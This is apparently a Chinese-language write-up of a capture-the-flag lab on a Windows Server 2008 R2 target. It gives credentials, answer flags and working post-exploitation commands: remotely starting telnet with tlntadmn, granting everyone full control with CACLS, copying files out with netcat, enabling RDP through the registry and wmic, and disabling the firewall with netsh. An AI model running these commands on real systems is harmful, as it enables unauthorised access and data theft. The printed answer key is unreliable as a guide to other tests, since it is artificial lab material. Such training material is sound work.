环境说明：

服务器场景1：windows（版本不详）

服务器场景1的IP：172.19.10.11

服务器场景1的 账号：administrator 服务器场景1的 密码：Admin123

条件限制:封闭靶机没有操作窗口

任务内容：

1. 通过本地PC中渗透测试平台对服务器场景进行系统版本扫描渗透测试，并将该操作显示结果中系统信息的确切版本作为FLAG提交；
2. 通过本地PC中渗透测试平台对服务器场景进行终端服务开启，还原黑客的攻击路径并将该操作显示结果中黑客攻击的服务端口号作为FLAG提交；
3. 通过本地PC中渗透测试平台对服务器场景进行渗透测试，找到服务器场景中的黑客在管理员用户的桌面下中的遗留的恶意可执行文件，并将该可执行文件全称作为FLAG提交；
4. 通过本地PC中渗透测试平台对服务器场景进行渗透测试，找到服务器场景中黑客在管理员桌面下的窃取的文本文档，将文件内容作为FLAG提交；
5. 通过本地PC中渗透测试平台对服务器场景进行渗透测试，找到服务器场景中黑客在管理员用户的文档中窃取的文件，将文件内容作为FLAG提交；
6. 通过本地PC中渗透测试平台对服务器场景进行渗透测试，找到服务器场景中黑客的后门用户并将用户名作为FLAG提交；
7. 通过本地PC中渗透测试平台对服务器场景进行渗透测试，找到服务器场景中的桌面背景，并将的文件全称作为FLAG提交；

解题思路

本题要求选手对windows的应用掌握考察程度考察比较深，很多问题的设置具有迷惑性，同样，相同的题目在不同的攻击机环境下表现出的难度是不一致的，所以更要求选手对各类工具的使用都要有所了解，并且在条件有限的环境下能做出正确的解题技巧。

1. 通过本地PC中渗透测试平台对服务器场景进行系统版本扫描渗透测试，并将该操作显示结果中系统信息的确切版本作为FLAG提交；

这一问比较简单，通过nmap通常的扫描手段可以获得操作系统的大致信息，使用vuln脚本扫描或者使用-A 参数可以获得操作系统的确切版本, -A的扫描实际上使用了系统探测、版本检测、脚本扫描、路由追踪等多重扫描，所以时间上会比较久。 需要值得注意的是，提问中需要知道的是操作系统确切版本，一般情况下如果题目没有明确规定，我们也可以通过-O 参数单独扫描目标操作系统大致版本范围，根据不同的题目需要使用不同的方式尝试应对。

nmap -sV -O -A -T5 172.19.9.12

所以第一题答案是：

Windows Server 2008 R2 7600

2. 通过本地PC中渗透测试平台对服务器场景进行终端服务开启，还原黑客的攻击路径并将该操作显示结果中黑客攻击的服务端口号作为FLAG提交；

本题的重点难题来了，大多数选手的第一反应当是远程桌面服务，（默认情况下即3389端口），遗憾的是，这个靶机打过了永恒之蓝补丁，通常意义上的445渗透攻击将无法生效。本题目终端服务实际指的是telnet，由于这个服务并非开启状态且修改了默认端口号，所以很容易让选手忽略。

注意观察题目，题目中给出了管理员用户的密码，这是一个非常重要的信息，如何使用？ 思路1：如果你所处攻击环境里拥有ATT＆CK模型的武器库（例如：msf或者其他攻击脚本）。你可以选择通常意义上的ms17-010进行攻击，但是由于这个靶机中已经对永恒之蓝的漏洞进行修复，所以要选择可以通过用户名和密码手段绕开的溢出攻击psexec，这也是黑客常用的攻击手段，通过psexec获得shell权限，打开终端服务 ，或者直接开启远程桌面连接。 思路2：大多数情况下,你所处攻击环境可使用的工具有限，这时候需要对windows有一定的了解。telnet服务有一个特殊的管理工具叫tlntadmn，tlntadmn是一条管理telnet服务的命令，一般情况是不会使用的。

打开WIN攻击机使用命令tlntadmn。 没有的话在桌面打开控制面板打开“程序和功能”里windows功能安装telnet所有组件。 命令tlntadmn 靶机ip -u 用户 -p 密码 查看靶机telnet服务详细信息 在这里可以看到本题答案。 命令tlntadmn 靶机ip -u 用户 -p 密码 start 启动靶机telnet服务

第二题答案

1000

3. 通过本地PC中渗透测试平台对服务器场景进行渗透测试，找到服务器场景中的黑客在管理员用户的桌面下中的遗留的恶意可执行文件，并将该可执行文件全称作为FLAG提交；

利用telnet 进入靶机，在管理员桌面目录下可以找到，这一问比较简单。 注意观察这个工具，随后可能会用得到。 cd C:/Users/Administrator/Desktop 进入桌面dir查看目录文件

telnet登录目标服务查看到程序

nc.exe

4. 通过本地PC中渗透测试平台对服务器场景进行渗透测试，找到服务器场景中黑客在管理员桌面下的窃取的文本文档，将文件内容作为FLAG提交；

其实都拿到管理员shell了 完全可以直接开远程桌面剩下的题目就是通杀,但这里我们还是按照题目官方的逻辑一步步走下去+

接上一题，这里我们并没有发现文档，可以推测文件被隐藏了 所以我们要使用dir /? 来查看帮助

DIR [drive:][path][filename] [/A[[:]attributes]] [/B] [/C] [/D] [/
  [/O[[:]sortorder]] [/P] [/Q] [/R] [/S] [/T[[:]timefield]] [/W] [

  [drive:][path][filename]
              指定要列出的驱动器、目录和/或文件。

  /A          显示具有指定属性的文件。
  属性         D  目录                R  只读文件
               H  隐藏文件            A  准备存档的文件
               S  系统文件            I  无内容索引文件
               L  重新分析点          O  脱机文件
               -  表示“否”的前缀
  /B          使用空格式(没有标题信息或摘要)。
  /C          在文件大小中显示千位数分隔符。这是默认值。用 /-C 来
              禁用分隔符显示。
  /D          跟宽式相同，但文件是按栏分类列出的。
  /L          用小写。
  /N          新的长列表格式，其中文件名在最右边。
  /O          用分类顺序列出文件。
  排列顺序     N  按名称(字母顺序)     S  按大小(从小到大)
               E  按扩展名(字母顺序)   D  按日期/时间(从先到后)
               G  组目录优先           -  反转顺序的前缀
  /P          在每个信息屏幕后暂停。
  /Q          显示文件所有者。
  /R          显示文件的备用数据流。
  /S          显示指定目录和所有子目录中的文件。

从中我可以看到 使用dir /AH 可以查看隐藏文件。 使用type flag.txt查看文件内容 发现无权限。 这里我们需要夺权，使用takeown 或者 cacls处理。

CACLS filename [/T] [/M] [/L] [/S[:SDDL]] [/E] [/C] [/G user:perm]
       [/R user [...]] [/P user:perm [...]] [/D user [...]]
   filename      显示 ACL。
   /T            更改当前目录及其所有子目录中
                 指定文件的 ACL。
   /L            对照目标处理符号链接本身
   /M            更改装载到目录的卷的 ACL
   /S            显示 DACL 的 SDDL 字符串。
   /S:SDDL       使用在 SDDL 字符串中指定的 ACL 替换 ACL。
                 (/E、/G、/R、/P 或 /D 无效)。
   /E            编辑 ACL 而不替换。
   /C            在出现拒绝访问错误时继续。
   /G user:perm  赋予指定用户访问权限。
                 Perm 可以是: R  读取
                              W  写入
                              C  更改(写入)
                              F  完全控制
   /R user       撤销指定用户的访问权限(仅在与 /E 一起使用时合法)。
   /P user:perm  替换指定用户的访问权限。
                 Perm 可以是: N  无
                              R  读取
                              W  写入
                              C  更改(写入)
                              F  完全控制
   /D user       拒绝指定用户的访问。

使用CACLS flag.txt /G everyone:F 修改权限 按Y确认后再次使用type flag.txt 即可获得答案

flag{youshallnotpass}

5. 通过本地PC中渗透测试平台对服务器场景进行渗透测试，找到服务器场景中黑客在管理员用户的文档中窃取的文件，将文件内容作为FLAG提交；

进入管理员用户的文档中发现是docx文件，但是系统中并未安装office，可以使用之前的nc.exe工具将文件传出打开即可。

telnet服务器：nc -l -p 4444 < 要传的文件
win客户端：nc 服务器ip 4444 > 文件

也可以利用docx文件特性进行处理 我们可以吧docx文件重命名为zip后缀，解压后可以发现里面有一个document.xml 里面就是docx文档的内容，即为我们的答案。

Flag{showmeyouway}

6. 通过本地PC中渗透测试平台对服务器场景进行渗透测试，找到服务器场景中黑客的后门用户并将用户名作为FLAG提交；

使用net user 并未找到可疑用户，推测帐户可能被隐藏。

查看注册表，在注册表中 HKEY_LOCAL_MACHINE\SA\SAM\Domains\Account\Users\Names 位置可以看到所有的用户名 也可以利用黑客用户提权的特征反向查找administrators组下用户

net localgroup administrators 

答案：

root$

7. 通过本地PC中渗透测试平台对服务器场景进行渗透测试，找到服务器场景中的桌面背景，并将的文件全称作为FLAG提交；

对服务器rdp服务开启

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

我这边喜欢wmic法

开启3389

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

这里发现还是连接预估是系统开启了防火墙我们通过命令关闭防火墙

netsh firewall set opmode disable

win下使用mstsc链接 在选项卡中开启背景。

linux桌面环境下可以利用rdesktop链接 注意追加参数-xl开启桌面背景。

还有一种取巧的方法是直接 cd C:\windwos\Web\Wallpaper\Windows 进入桌面背景文档dir查看目录文件。

答案：

img0.jpg